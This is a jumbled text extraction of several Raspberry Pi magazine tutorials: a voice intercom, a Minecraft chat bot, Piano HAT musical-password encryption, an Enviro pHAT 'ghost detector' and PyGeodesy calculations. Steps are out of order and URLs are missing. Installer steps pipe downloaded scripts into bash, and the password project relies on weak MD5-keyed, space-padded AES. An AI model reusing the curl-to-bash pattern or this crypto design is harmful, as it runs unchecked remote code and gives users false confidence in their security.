been used to set up custom voice commands
that trigger the lights of a doll’s house and disco
lights by activating a WeMo smart socket. The
code for the AIY Voice Kit has been updated
in significant ways since Martin finished his
intercom project and you can change a few lines
of code to activate the Assistant by pressing a
button, clapping your hands or just saying ‘OK
Google’ to trigger a device’s listening mode.
Above To integrate the Pi-powered intercom
with as many smart devices as possible in his
home, Martin used IFTTT (If This Then That) to pair
together triggers and actions from various online
services that he’d added to his IFTTT account.
He says, “Google Assistant seems more flexible
than Alexa for this, as you can configure multiple
‘trigger’ phrases [...] and customise the response
that the assistant will read out”
Above Putting the intercom together involved a lucky break: Martin says that had the case “been
even 5mm smaller in any direction it just wouldn’t have worked”. As it was, he had to trim away plastic
protrusions inside the case, such as posts, with a rotary tool to make sure all the components fitted
Create a chat bot in Minecraft
on the Raspberry Pi
is head of
computing and
network manager
at an all-through
state school.
in Computer
Science, Calvin
also consults with
schools all over
London, helping
provide high-quality teaching
and learning in
Block IDs
Angry IP Scanner
Tutorial files
Program your Raspberry Pi using Python to read a chat script
directly from a text file into Minecraft
Open the newly created files in your favourite text editor.
All of this can be done from Terminal, if you use nano, Vim
or Emacs.
Using some basic Python code, we’re going to read and
write directly from text files saved on your computer
into your Minecraft world. Steve (or Alex) will be chatting
in game from a pre-written script. This simple chat bot
could have all kinds of applications – as with all things
Minecraft, the limit is your own imagination!
This tutorial is written with Minecraft Pi Edition in
mind, but you don’t have to be running Minecraft on a
Raspberry Pi to follow along. We’ve put together a little
package that will work on any version of Minecraft, so
if you would like to run this tutorial on your favourite
flavour of desktop Linux, Pi or no Pi, you can do. To allow
Python to hook into Minecraft, you’ll need to install
McPiFoMo (link available in the Resources section) by
extracting the contents of the .minecraft directory into
~/.minecraft. McPiFoMo includes MCPiPy from and Raspberry Jam, developed by Alexander
Pruss. Provided you have Python installed, which of
course comes installed as standard on most distros, no
additional software is required, other than your favourite
text editor or Python IDLE.
Python scripts in this tutorial should always be saved
in ~/.minecraft/mcpipy/, regardless of whether
you’re running Minecraft Pi Edition or Linux Minecraft. Be
sure to run Minecraft with the ‘Forge 1.8’ profile included
in McPiFoMo for your scripts to run correctly.
Program your script
Start off the code in your file by
importing the Minecraft libraries into Python, initiating an
instance of Minecraft within a variable (mc) and opening
the text file in read-only mode ("r") within another
variable (mcScript).
from mc import *
mc = Minecraft()
mcScript = open("script.txt", "r")
Read, write and append text files in Python
If you would like to read from a text file outside of the
mcpipy directory where your Python file is located, you
can do so with:
mcScript = open("~/.minecraft/mcpipy/script.txt", "r+")
You’ll also notice we’re using "r+" instead of "r" this time.
The available modes for editing text files are: append (a),
read (r), and read+write (r+).
Write to your script with Python
As with any programming tutorial, we start off by
printing ‘Hello World!’:
Set up your dialogue
We’ll want to create two empty documents for
this tutorial, one being a regular text file and the other
an empty Python script. You can do this in a Terminal
window with the following commands:
touch ~/.minecraft/mcpipy/script.txt
touch ~/.minecraft/mcpipy/
mcScript = open("~/.minecraft/mcpipy/script.txt", "r+")
mcScript.write("Hello World")
mcScript.close()
Here we’re opening the file in read+write mode, saving a
string to the file and closing it. It’s important to note that
text files will only save if closed.
Display your script in-game
Now that we’ve got something written in our text
file, we can ‘print’ our scripts in-game:
mcScript = open("~/.minecraft/mcpipy/script.txt", "r+")
line = mcScript.readline()
mc.postToChat(line)
you may want to write text back to the script file:
with open("script.txt", "w") as mcScript:
    mcScript.write("Strings" + variables)
Here we can save strings and/or variables directly into the
text file. If you’re using with, you don’t need to remember
to mcScript.close() – it will save automatically.
Combine chat bots with previous projects
Where this gets really interesting is when you
use text scripts for commands instead of dialogue. Take
our pixel art code from issue 181; you could call a text
file from the pixelArt variable instead of hard-writing
numbers into the code.
pixelArt = mcScript.readline()
You can now change the pixel art every time by adjusting
a line in the text file, without altering the Python code.
Note that we’re using the postToChat action from our
mc instance, rather than print, and we’re posting the
contents of a variable instead of a string.
Read directly into your world
You can use the traditional print command to
read text into your game world. The following code will
read the first line of your text file.
mcScript = open("~/.minecraft/mcpipy/script.txt", "r+")
print mcScript.readline()
Add a few more lines to script.txt after ‘Hello World’.
Perhaps create some dialogue for an NPC.
Rehearse multiple lines at a time
You’ll probably want to post several lines of
dialogue into your game at a time, especially if you’re
creating a bot of some kind. This will post line-by-line:
mcScript = open("~/.minecraft/mcpipy/script.txt", "r+")
print mcScript.readline()
print mcScript.readline()
print mcScript.readline()
Read out your script with a loop
The previous step will only read the first three
lines. That might be useful if you only want your NPC to
say so many things at once, but you can create a for loop
to read the entire document line-by-line, too:
for line in mcScript.readlines():
    print line
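Putting the steps together, a complete bot might look like the sketch below. The function name, the pause length and the stdout fallback are our own additions; the mc module comes from McPiFoMo, so the fallback lets you test the file-handling logic even without Minecraft running.

```python
import time

# Use Minecraft chat when the McPiFoMo mc module is available,
# otherwise just echo lines to the terminal.
try:
    from mc import Minecraft
    say = Minecraft().postToChat
except ImportError:
    say = print

def run_chat_bot(script_path, delay=2.0):
    """Post each non-empty line of the dialogue file to the chat."""
    posted = []
    with open(script_path) as mcScript:
        for line in mcScript:
            line = line.strip()
            if line:
                say(line)
                posted.append(line)
                time.sleep(delay)  # pause so lines don't flood the chat
    return posted
```

Calling `run_chat_bot("script.txt")` from ~/.minecraft/mcpipy/ would then deliver your NPC’s whole script line by line.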
Write and autosave
Python and Minecraft Pi
Using Python, we can hook directly into Minecraft Pi
to perform complex calculations, alter the location
of our player character and spawn blocks. We can do
pretty much anything from creating prefabricated
pixel art, to communicating directly with the player.
In this issue we read and write directly to text files
to create a non-player character script that can be
printed to the chat display in-game.
With each issue of LU&D we take a deeper look
into coding Python for Minecraft Pi, with the aims
of both improving our Python programming skills
and gaining a better understanding of what goes on
underneath the hood of everyone’s favourite voxel-based videogame.
Depending on what kind of bot you’re creating,
Piano HAT
Make musical passwords
Mozart meets Moonraker with a Pi project for musically
encoding your secrets using Pimoroni’s Piano HAT
is a technology
journalist
specialising in
cybersecurity and
retro tech.
Piano HAT
Tutorial files
The Pimoroni Piano HAT is an extraordinarily useful
board that can turn your Raspberry Pi into an electronic
keyboard. The keys are responsive to touch and each
one has an LED which can light up as you play. Pimoroni
has thoughtfully compiled an excellent library of coding
samples for your Pi which enable you to crank out tunes
within minutes of receiving your Piano HAT.
In this project we will talk you through the basics of
attaching the Piano HAT to your Pi, as well as how to use
it to generate 8-bit tones and play back piano and drum
sounds. You will then learn to use the custom ‘pianohat-password’ Python scripts to encode a secret message
using musical notes. The first script,
allows you to record a musical password by playing
a few notes, then invites you to enter some text you
wish to hide, such as a password or email address.
Use the second script,, to decode your
hidden secret.
Set up your Pi and add Piano HAT
This guide requires a clean install of the latest
version of Raspbian on your Pi. The easiest way to ensure
this is to visit and follow the
steps to install NOOBS to your microSD card. Once the
installation is complete, run sudo apt-get update
and sudo apt-get upgrade to bring Raspbian fully up
to date.
The Piano HAT itself is very easy to install. Marry up the
Pi’s GPIO pins to the connector on the HAT. The Piano HAT
is compatible with all models of Raspberry Pi; however,
if you have a Pi Zero or Zero W, you will need to attach a
male GPIO header yourself.
Download installation scripts
Open a Terminal window on your Pi, or connect
via SSH, and run the command:
curl | bash
Read the message about I2C and press Y to continue. The
installer will then ask if you wish to install the Piano HAT
samples. Press Y to confirm you wish to do this too, as
you can use these to check the Piano HAT is working later.
Installing the samples also downloads some of the
Python modules you will need to use the Piano scripts,
such as NumPy.
If successful, the installer will display the message: ‘All
done, enjoy your Piano HAT!’
Test 8-bit synth keyboard
If you chose to download the Piano HAT samples
in the previous step, there is now a folder named
Pimoroni in your home folder containing some example
scripts you can work with.
Connect a speaker or a pair of earphones to the Pi.
Next, using Terminal, run the following command to
transform your Pi into an 8-bit synthesizer:
sudo python /home/pi/Pimoroni/pianohat/
Download pianohat-password
Now that you’re satisfied the Piano HAT is
working correctly and understand its basic workings, it’s
time to download pianohat-password, which is a modified
version of the example script
Open a Terminal on your Pi and run:
git clone
Alternatively, copy the necessary scripts over from the
LU&D cover disc or FileSilo. If you do so, don’t forget to
place the sounds folder in the same folder as the scripts
in order to hear tones as you play.
Before proceeding, run the following commands to
install the required software for encryption:
sudo apt-get install build-essential libffi-dev
sudo pip install bcrypt pycrypto
Press a few keys to ‘make beautiful music’. These tones
are generated using the Pygame module, specifically the
make_sound method to create 8-bit tones with their own
frequency, bitrate and sample rates.
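The exact synth code ships with the Pimoroni examples; as an illustration of the idea, here is a minimal reconstruction (the names, sample rate and use of plain lists are our own — the real examples build NumPy arrays) of generating an 8-bit square wave ready for pygame.sndarray.make_sound:

```python
import math

SAMPLE_RATE = 22050  # assumed sample rate for this sketch

def square_wave(frequency, duration=0.5, volume=127):
    """Return `duration` seconds of an 8-bit square wave at `frequency` Hz.

    Each cycle spends its first half at +volume and its second at -volume,
    which is what gives the tone its buzzy chiptune character.
    """
    samples = []
    for t in range(int(SAMPLE_RATE * duration)):
        phase = (t * frequency / SAMPLE_RATE) % 1.0
        samples.append(volume if phase < 0.5 else -volume)
    return samples

# On the Pi the buffer would be handed to pygame for playback, roughly:
#   import pygame, numpy
#   pygame.mixer.init(SAMPLE_RATE, -8, 1)  # signed 8-bit, mono
#   buf = numpy.array(square_wave(440), dtype=numpy.int8)
#   pygame.sndarray.make_sound(buf).play()
```

Swapping the square for a sine or sawtooth in the same loop changes the timbre without touching the rest of the code.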
Review password entry
Open your File Explorer and navigate to the new
folder named pianohat-password. Right-click on the
script, then open it using either the
Thonny IDE or the Text Editor.
Test simple piano and drums
When you tire of tinny 8-bit tones, press Ctrl+C
and run another example Piano script:
sudo python /home/pi/Pimoroni/pianohat/
When the script runs, it asks you to play the notes that
will appear on your keyboard. The ‘Instrument’ button
now launches the procedure confirm_password.
The value firstpw is a list, which is used provisionally
to store the password as you play. Scroll down to the
procedure handle_note. Each time a key is pressed, the
relevant number (channel) is displayed and this value is
added to the list firstpw.
Review password input
Next, scroll down to the procedure named
confirm_password. This procedure is launched when
This script uses a series of WAV files to play a series of
piano notes or drum beats (use the ‘Instrument’ key to
switch between the two).
Use Ctrl+C to quit the script, then locate it in the file
browser. Right-click to open it with Thonny IDE.
As you will see, the script runs a procedure each
time one of the 16 buttons on the Piano HAT keyboard
is pressed. Piano keys are numbered according to
note and octave. For instance, the first octave of C is
numbered 24.
the user presses the ‘Instrument’ button to submit
the password.
In the first instance, the script will display the numeric
equivalents to the keys. The for loop is used to play back
the tones via the speaker every 0.7 seconds, to ensure
you remember them.
If you are serious about security, you may well prefer
to use a # to comment out these lines, since it’s generally
a bad idea security-wise to show your password in
‘plain’ text.
MD5 hash
The password is then converted from a list (firstpw) to
a string (strpw), in preparation for it being hashed.
inclined readers may
have noticed that
the piano password
script generates an
MD5 hash of the
musical password.
This doesn’t improve
security but does
mean that the
password is exactly
16 bytes long, which
is required for
AES encryption.
Review password hashing
Review text encoding
Once the key tone password has been converted
to a string, the piano-password script generates an MD5
hash of it. This MD5 hash in turn is then converted to yet
another hash using bcrypt. The advantage of doing things
this way is that bcrypt automatically uses a unique ‘salt’
when encoding passwords. This makes it highly unlikely
that anyone who chooses the same musical password as
you will have exactly the same hash.
This also means, however, that each bcrypt hash is
unique, so the script saves it to a hidden file named
.pianohash. Feel free to change the filename and location
if you wish.
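In outline, the hashing pipeline looks like the sketch below. The function names are ours, and we use the standard library’s PBKDF2 as a stand-in for bcrypt so that the idea of per-password salting is visible without extra modules — the actual script calls bcrypt, which generates and embeds its salt automatically.

```python
import hashlib
import os

def notes_to_key(notes):
    """List of key numbers -> string -> 16-byte MD5 digest (AES-ready)."""
    strpw = "".join(str(n) for n in notes)
    return hashlib.md5(strpw.encode()).digest()

def salted_hash(key, salt=None):
    """Salted verification hash of the musical password.

    A fresh random salt means two users who pick the same tune
    still end up with different stored hashes.
    """
    if salt is None:
        salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", key, salt, 100_000)
```

To verify a login attempt you re-hash the entered notes with the stored salt and compare the results.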
Once the password has been saved, the
piano-password script launches the encode_text
procedure. This makes use of the PyCrypto module. The
raw_input value (now simply input in Python 3) prompts
you as the user to enter your secret data.
The encryption algorithm used is AES, which works
on 16-byte (128-bit) blocks of data. The encode_text
procedure uses a while loop to pad out the text. If you
wish to change the scheme used, you may need to
edit this.
The text you input is saved to a hidden file named
.pianovault in the same folder as the piano-password
script. Feel free to change this if you wish.
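The padding step is easy to picture. Here is a sketch of the while-loop idea (the filler character and function name are ours; the script’s own padding scheme may differ), with the PyCrypto call it feeds into shown as a comment:

```python
BLOCK = 16  # AES encrypts 16-byte (128-bit) blocks

def pad(text, filler=" "):
    """Pad `text` out to a multiple of 16 bytes with `filler`."""
    while len(text) % BLOCK != 0:
        text += filler
    return text

# With PyCrypto, the padded secret is then encrypted roughly like:
#   from Crypto.Cipher import AES
#   cipher = AES.new(key_16_bytes)      # the MD5 digest is the key
#   ciphertext = cipher.encrypt(pad(secret))
```

Note that space-padding only suits plain text; binary data would need an unambiguous scheme such as PKCS#7, where the pad bytes encode their own length.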
Review text decryption
The decode_text procedure firstly loads your
encrypted data from .pianovault. If you’ve decided to
change the location or name of the file holding your
encoded text in the piano-password script, make sure to
change it here too.
The beauty of AES encryption is that it’s symmetric
– the same password used to encode data can be used
to decode it. Here the procedure simply takes the key
tones that you inputted earlier and displays them via the
Terminal window.
Both the .pianohash and .pianovault files are opened
as read-only to make sure the data isn’t corrupted. If you
want to make changes during runtime, change the option
r to w+.
Create your first musical password
Having got your hands dirty with the Python code,
exit Thonny or your Text Editor and open Terminal. Make
sure your speaker or headphones are connected and run
the piano-password script with:
sudo python pianohat-password/piano-password.py
Review password confirmation
Close down the script and
open using the Thonny IDE or the Text
Editor. This script allows you to input your previously
chosen musical password and decrypt the text stored
in .pianovault.
The script works similarly to the ‘password’ program
in that it will ask you to key in your notes and display
them as you type. The ‘Instrument’ key is used to
confirm you’ve entered the password, at which point the
procedure confirm_password is launched.
This procedure essentially works in reverse to
encode_text. The script loads the hashed password and
compares it to the notes you’ve input. If successful, it
launches the procedure decode_text.
The script will welcome you and ask you to use your
notes. Remember, you can move up or down an octave
using the buttons below the ‘Instrument’ button.
In the example, we’ve used the five-note motif from
Close Encounters of the Third Kind: G, A, F, (octave lower)
F, C. Ideally, you should use an original tune that you can
remember easily. Make a note of the channel numbers on
paper as a backup.
Encode your message
Press the ‘Instrument’ key when you have finished
entering your tones. Your password will be printed to
the Terminal as a series of numbers corresponding to
button presses, as outlined above. The script will also
play back the tones to you and will go on to save a hash of
your password.
Now enter your secret text. There’s no real limit on
what this can be. Feel free to encode a password, a
message for a friend, or a weblink to a non-text file such
as an image.
When you have finished typing, simply press Return.
The script will report the encrypted text has been saved.
Decode your message
When ready to retrieve your data, reopen Terminal
on your Pi or connect via SSH and run:
sudo python pianohat-password/
Play your musical password, then press the ‘Instrument’
button. If the password is incorrect, you’ll see a message
to that effect and the script will exit.
If the password is correct, the script will display the
message ‘Password is Correct’ and inform you it’s in the
process of decoding your text. The decrypted message
itself will appear below.
While the decrypted text is displayed here in the
Terminal, you cannot alter it. If you want to do so, run the script again.
time. Consider expanding on this basic script to allow you
to specify a filename when encoding your secrets.
Python makes this easy programmatically through use
of the input command; for instance, insert the following
into the encode_text procedure in
filename = input('Enter filename: ')
Make sure to amend the open file command as follows:
c = open(filename, "w+")
Don’t forget to mirror any changes you make in the script to the script.
Changing tones
Sharp-eyed readers will have noticed that in
modifying the ‘Instrument’ button to enter passwords,
you can now no longer choose between drum beats and
piano tones. If you are more at home with a hi-hat than a
high A, you can switch to using drum sounds quite easily.
Open Terminal on your Pi and copy the drums
directory from the Pimoroni examples folder into the
pianohat-password folder:
cp -r /home/pi/Pimoroni/pianohat/examples/
sounds/drums /home/pi/pianohat-password/sounds
Make sure to move the piano folder outside the sounds
folder too, e.g. by moving it to the trash. This ensures
there’s only one instrument for the script to choose.
Add to your scripts
The piano password scripts are functional but as
it stands, they can only be used to encode one secret at a
Playing passwords
If you haven’t played piano before, Pimoroni has put together
an excellent tutorial for you. Open a Terminal and run:
sudo python Pimoroni/pianohat/examples/
Each of the keys on the Piano HAT has a built-in LED. Simply
press the keys that light up to play a simple melody (in this
case Twinkle, Twinkle, Little Star). The tutorial has the added
advantage that if you accidentally press any other keys
besides the one that is lit, no sound will play.
Once you feel comfortable with the basics, if you want to
choose some random notes for your musical password, visit Use the ‘Options’ button
to increase the number of notes (up to 7).
To generate a longer set of notes, visit
integer-sets. This will allow you to generate a set of unique
integers. You can use the same numbering system (1-60) as
outlined in the scripts for notes, or make up your own.
Ghost Detector
A Pi owner's guide to ghosts
and how to catch them
Dan Aldred
is a Raspberry Pi
enthusiast, teacher
and coder who
has temporarily
diversified into
ghost bustin'
(because it makes
him feel good).
Deploy the Pi, Enviro pHAT and an infrared camera to capture
evidence of anything up to a Class 5 Full-Roaming Vapor
Raspberry Pi
Enviro pHAT
Black Hat Hack3r
Tutorial files
As a child, your author distinctly remembers learning
that if a ghost or spectre is present, there are several
environmental changes that can occur. First, the room
may feel colder due to a sudden drop in temperature.
Second, objects may mysteriously move by themselves
to a new location. Third, you may observe a strange
coloured light or a bright white light close to where the
supernatural entity is.
Pimoroni’s Enviro pHAT is the perfect hardware suite
to catch ghosts. It packs four different sensors, letting
you measure temperature, pressure, light level, colour,
3-axis motion, compass heading and analogue inputs.
They state that “It’s ideal for monitoring conditions in
your house, garage or galleon. Set up a web server with
Flask and remotely monitor everything from anywhere.”
What they failed to mention is that you can also use it to
catch ghosts.
Use the BMP280 temperature/pressure sensor to
measure a drop in temperature, the TCS3472 light and
RGB colour sensor to pick up any changes in light, and
then the LSM303D accelerometer/magnetometer sensor
for movement – that book being flown across the room or
the table rocking or a door opening all on its own.
Combine the Enviro pHAT with the Pi Camera
Module and an infrared (IR) LED ring and you have the
perfect setup to capture photographic evidence of your
supernatural visitors.
Install the required software
Begin by setting up your Raspberry Pi and
installing the required software libraries. Open up a
Terminal window and update and upgrade the OS, lines
one and two. Then install the Enviro pHAT library from
Pimoroni by typing the command on line three. This will
download and install the required software and several
example programs. To make use of an audio warning,
install the MP3 library, mpg321, line four. Shut down your
Pi by typing the command sudo shutdown, then unplug the
power supply.
sudo apt-get update
sudo apt-get upgrade
sudo curl -sS
envirophat | bash
sudo apt-get install mpg321
Finally, run sudo raspi-config and select the required
setting to enable the camera, then reboot your
Raspberry Pi.
Wire up the LISIPAROI
The LISIPAROI requires only four wires. Attach
the power wire, the one on the far right, to the 5V pin
(physical pin 2). The two middle pins are used for the
ground/GND connections. Any two of these physical
board pins can be used: 6, 9, 14, 20, 25, 30, 34 and 39.
The last connection on the left is the GPIO pin, which in
this tutorial uses GPIO 10 (physical pin 19). Attach the
required wires (refer to Fig 1).
Set up the hardware
Next, we need to connect the hardware. It is
recommended that you use the Mini Black Hat Hack3r,
although the pinout website
provides a wiring diagram which means you don’t
have to. Attach the Pi Camera Module with the blue
strip pointing away from the HDMI port. Next, attach the
Black HAT Hack3r and place the Enviro pHAT onto the
pins. This then provides additional pins for the wiring of
the LISIPAROI IR LED ring. Last, enable the Pi Camera in
the OS settings: open a Terminal window and run sudo
raspi-config.
Test the camera
Create a small program to test that the Pi
Camera is connected, enabled and working correctly.
Open your Python editor and copy out the program below.
This will start a camera preview which you can view on
your monitor. Then the camera will take a picture and
save it onto your Pi desktop. If it does not work, check
that the camera is connected correctly, that it is enabled
in the Pi settings and that the code is correct.
from picamera import PiCamera
from time import sleep
camera = PiCamera()
camera.start_preview()
sleep(3)
camera.capture('/home/pi/Desktop/test.jpg')
Import the modules
Now to create the full program. Begin this step by
opening a new, blank Python file; this will hold the main
program for the Ghost Detector. Import the required
modules – system and OS – to write the image files back
to a folder. On line four, import the Pi Camera functions
and line five, the GPIO software. On the last line, import
the main Enviro pHAT features: light, weather (for the
temperature) and motion.
Fig 1 Wire up the
LISIPAROI to 5V power
and ground pins, and
a GPIO pin (GPIO 10 here)
import sys
import os
import time
from picamera import PiCamera
import RPi.GPIO as GPIO
from envirophat import light, weather, motion, leds, analog

camera = PiCamera()

#variables for the motion sensing#
threshold = 0.2
readings = []
last_z = 0
Set values for the motion sensor
Set the GPIO pin numbering system to BCM;
this option means that you are referencing the pins by
the ‘Broadcom SoC channel’ number, line one. These are
the standard numbers after the ‘GPIO’ label, instead of
the physical pin number. Set GPIO 10 as the output, line
two; this is used as a trigger for the IR LEDs. Next, create
three variables to hold the required values for the motion
sensor. The first value refers to the amount of movement
to detect, the second is a list to hold the gathered
sensor readings, and the third is the last position of the
measurement on the z axis.
GPIO.setmode(GPIO.BCM)
GPIO.setup(10, GPIO.OUT)
Save images and take a sensor reading
If you are lucky enough to encounter a spectre
then you will have photographic evidence. This file
is named and saved as a picture number. Create a
global variable to store the picture number, line one. If
you capture more than one image, you do not want to
overwrite the previous one. Set the initial image value at
0, line two.
global file_name
file_name = "0"
Create a camera function – part 1
The main program works by checking a reading
from a sensor and if it falls within a range of values then
it triggers a function which controls the camera. Begin
by naming the function, line one. Then add the global
filename, line two; this means you can increment the
filename each time a new image is taken. On line three,
set the GPIO 10 to HIGH. This creates a circuit on pin
10 and sends power to the IR LEDs, turning them on,
resulting in the camera being able to take an image in
the dark.
def catch_a_ghost():
    global file_name
    GPIO.output(10, GPIO.HIGH)
    print(file_name)
Create a camera function – part 2
Complete the function by triggering the camera
and setting the name of the image file, line one.
Then turn off the infrared LEDs by setting GPIO 10 to
LOW, line three. To avoid overwriting the image file,
increment the filename by one using the code file_name
= int(file_name) + int(1). The int converts the
value to an integer, so that it can be added to. However,
filenames are not integers, so you must convert the name
back into a string, line five.
    camera.capture(file_name + ".jpg")
    GPIO.output(10, GPIO.LOW)
    file_name = int(file_name) + int(1)
    file_name = str(file_name)
    os.system('mpg321 /home/pi/wegotone.mp3 &')
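The int/str round trip can be factored into a tiny helper if you want to convince yourself the naming logic behaves (a sketch of the step above, not part of the tutorial script):

```python
def next_file_name(name):
    """Increment a numeric filename held as a string, e.g. '0' -> '1'."""
    return str(int(name) + 1)

first = next_file_name("0")
later = next_file_name("41")
```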
Establish the current room temperature
To discover if a ghost is present, you can check
for a sudden change in temperature. First, we record the
starting room temperature, with weather.temperature(),
storing this into a variable, line one. Next, create a loop,
line five, which will continually check for changes. On
line six, create a new variable called current_temp and
take another new reading. This value can then be used
and compared with the start temperature in Step 14, to
calculate if there is a significant shift in temperature.
start_temp = weather.temperature()
print ("The room is ", start_temp)
while True:
    current_temp = weather.temperature()
    print("Current Temperature is", current_temp)
The final line triggers an
optional audio alarm informing you that the camera has
taken a picture. You may want to leave this line out if your
setup is in a remote haunted house, or if you feel tempted
to check the image straight away and you don’t want to
risk running into the ghost. It might be best to wait until
the morning.
What is cron?
Cron is used as a time-based job scheduler that permits
you to schedule jobs (commands or shell scripts) to run
periodically at certain times or dates. It is commonly
employed to automate system maintenance programs such
as disk or administration tasks.
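For instance, each crontab entry is five time fields (minute, hour, day of month, month, day of week) followed by the command to run; the script path below is a made-up example:

```shell
# m  h  dom mon dow  command
30   2  *   *   *    python /home/pi/
# Special strings replace the five fields; this one runs at every boot:
@reboot python /home/pi/
```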
Sensing motion
Next, set up the code to record and respond to
movement. Begin by taking a reading from the motion
sensor and appending the value to the list you created in
Step 6, readings = []. On line two, update the list with
the readings. Then use a calculation, line three, to add
together all the readings and divide by the total number
of readings in the list. This calculates an average value
and is used to compare if there is a change in the z axis. A
change indicates movement.
readings.append(motion.accelerometer().z)
readings = readings[-4:]
z = sum(readings) / len(readings)
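Taken on its own, the append-trim-average logic behaves like this sketch, with invented numbers standing in for accelerometer z readings:

```python
def update_motion(readings, new_z, window=4):
    """Append a reading, keep only the last `window`, return the list and its mean."""
    readings = readings + [new_z]
    readings = readings[-window:]
    return readings, sum(readings) / len(readings)

# A steady hold followed by a sudden jolt
readings = []
for sample in (0.98, 1.00, 0.99, 1.01, 1.60):
    readings, z = update_motion(readings, sample)
```

The jolt drags the four-reading mean well away from the last settled z value, which is exactly what the threshold comparison in the next step detects.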
Sensing light
If a ghost or spectre appears then it may emit
additional light or even a strange glow. Use the Enviro
pHAT’s light sensor to measure this reading. Create a
variable to store the value, line one, and collect the red,
green and blue (RGB) values, line two. On lines three and
four, print out these values; this is useful in determining
the strength and colour of the light.
amount_of_light = light.light()
r, g, b = light.rgb()
print("Amount of light", amount_of_light)
print ("Colour", r, g, b)
Responding to movement
Now to check for movement which could be
triggered by the Halloween monster knocking into the
pHAT. If it is a ghost, then it will just pass through, but the
light sensor will be triggered instead. Begin by comparing
the last z position with the new z position and threshold
value, line one. This always checks if there is movement
from the ‘current position’ and responds even if the pHAT
is moved several times. If movement is detected then
trigger the Camera using the function catch_a_ghost(),
which you created in Step 8.
"""Check for motion or movement"""
if last_z > 0 and abs(z - last_z) > threshold:
    print("Motion Detected!!!")
    catch_a_ghost()
last_z = z
Responding to a temperature change
In Step 10 you wrote the code to take a
temperature reading and store the value in a variable.
Compare this value with the current temperature, line
one. Remember, if a ghost is present then there should
be a sudden drop in temperature. If the temperature
drops by more than 5 degrees in a second then you may
have a ghost present. Trigger the camera, line three, then
set the start temperature to the new temperature value.
This will accommodate a gradual drop in temperature
during the night.
"""Check for a change in temperature"""
if start_temp - current_temp > 5:
    print("GHOST")
    catch_a_ghost()
    start_temp = current_temp
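Reduced to its essentials, the check is a single comparison. This sketch (with invented temperatures) also shows why re-arming the baseline stops a slow overnight cool-down from firing the alarm:

```python
def ghost_temp_check(start_temp, current_temp, drop=5):
    """True when the temperature has fallen by more than `drop` degrees."""
    return (start_temp - current_temp) > drop

triggered = ghost_temp_check(21.0, 15.5)  # sudden 5.5-degree plunge
rearmed = ghost_temp_check(15.5, 15.0)    # after re-baselining, small drift is ignored
```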
Responding to light
The last section of the program is similar to the
previous two steps. Check for a change in the amount of
light which you collected in Step 12 and then compare
it to a preset value. A value of zero indicates that
there is no light. In this program, on line one, check for
a value greater than two and then trigger the camera,
line three. The value can be adjusted to complement the
environment; for example, if there is a lot of light from
street lamps then set the value higher.
if amount_of_light > 2:
    print("GHOST")
    catch_a_ghost()
except KeyboardInterrupt:
Auto-start the program
You may want to deploy your ghost catcher in a
location where you can’t use a monitor. This requires the
program to start automatically when you plug the power
in. Open the Terminal and type sudo crontab -e to open
crontab, a daemon where you can list programs to run or
execute at specific times. Scroll to the bottom of the list
and enter the @reboot command followed by the folder
location and filename of your ghost catcher program:
@reboot sudo python /home/pi/
The ‘&’ at the end of the command will run the code in the
background and your Raspberry Pi will boot up as normal.
Save and exit; now your program will run at bootup.
Happy ghost busting!
GPIO pin numbering
GPIO pins are a physical interface between the Pi and the
outside world. At the simplest level, you can think of them as
switches that you can turn on or off (input). You can also
program your Raspberry Pi to turn them on or off (output). The
GPIO.BCM option means that you are referring to the pins by
the ‘Broadcom SoC channel’ number. The GPIO.BOARD option
specifies that you are referring to the pins by their physical
pin number.
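To make the two schemes concrete, here is a small lookup for the pins this tutorial touches (an illustrative table only — RPi.GPIO performs this translation for you internally):

```python
# BCM channel number -> physical header (BOARD) pin
BCM_TO_BOARD = {
    10: 19,  # GPIO 10, used here to switch the IR LED ring
    2: 3,    # GPIO 2 (SDA)
    3: 5,    # GPIO 3 (SCL)
}

def board_pin(bcm_channel):
    """Translate a BCM channel number to its physical header pin."""
    return BCM_TO_BOARD[bcm_channel]
```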
Pythonista’s Razor
Carry out portable geodesy
With the availability of Raspberry Pis, you can now do fairly
complex geodesy calculations live in the field
he Raspberry Pi platform
allows for projects
where you can bring a
computer with you
when you go out into the field to do
research. One of these research
areas is geodesy (and geomatics),
which is the branch of applied
mathematics that’s concerned with
measuring and understanding the
Earth’s geometric shape. As you may
have suspected, doing three-dimensional mathematics on a
curved surface can be a tad messy.
Hence the need to have some robust
computing handy. The traditional
way to do field work is to go out and
collect measurements, then go back
to the office. This month, we’ll look at
a Python module called PyGeodesy,
which can be used to handle these
types of calculations. This isn’t
available in the regular package
repos, so you will need to install it
with sudo pip install pygeodesy.
Joey Bernard
is a true Renaissance
man. He splits his
time between building
furniture, helping
researchers with
scientific computing
problems and writing
Android apps.
It’s the official
language of the
Raspberry Pi.
Read the docs at
One of the first things you may
want to do is to convert data
between different coordinate
systems. There are separate objects
that can be used to store data
points within a particular coordinate
system. For example, you can use
Universal Transverse Mercator (UTM)
coordinates within your program and
create an appropriate object with:
import pygeodesy
utm1 = pygeodesy.utm.parseUTM('31 N 448251 5411932')
You can enter the data point as
a string made up of the zone,
hemisphere, easting and northing.
The UTM object has properties
which allow you to pull out each of
the individual elements, such as
the easting, the northing or the
hemisphere. If, instead of a UTM
string, you have a set of latitude and
longitude values, you can create a
LatLon object and use that to create
your UTM object. The following gives
an example of how you could do this:
import pygeodesy
latlon1 = pygeodesy.LatLon(49.66618, 3.45063)
utm1 = pygeodesy.utm.toUtm(latlon1)
"Doing 3D mathematics on a
curved surface can be messy"
This uses the usual ellipsoidal
mathematics to make the
calculations. There is also another
set of equations, developed by
Thaddeus Vincenty in 1975, that
can also be used to manage points
defined by latitude and longitude.
The advantage to this alternative is
that you can give it an Earth model
to define the coordinate system by,
rather than accepting the default
ellipsoidal model. Once you have a
UTM object, it has helper methods
to convert it to other supported
coordinate systems. The following
code gives a couple of examples:
# Convert to an ellipsoidal geodetic point
latlon2 = utm1.toLatLon(pygeodesy.ellipsoidalVincenty.LatLon)
# Convert to an MGRS grid
mgrs1 = utm1.toMgrs()
The first example enables you to
convert back to a set of latitude and
longitude values, but you need to
provide which type of Earth model
you wish to use by including the
class of the type you are interested
in. The second example converts
the point to a NATO Military Grid
Reference System (MGRS) grid point.
Now you have the ability to enter
points, what can you do with them?
One interesting problem is finding
the central point given a series of
geographical points on the globe.
Again, you’d need to choose which
ellipsoidal model that you wanted to
use to do the calculations with. Using
the defaults, you could do this:
import pygeodesy.ellipsoidalNvector as penv
mean_point = penv.meanOf(point_list, LatLon=penv.LatLon)
The variable point_list is a
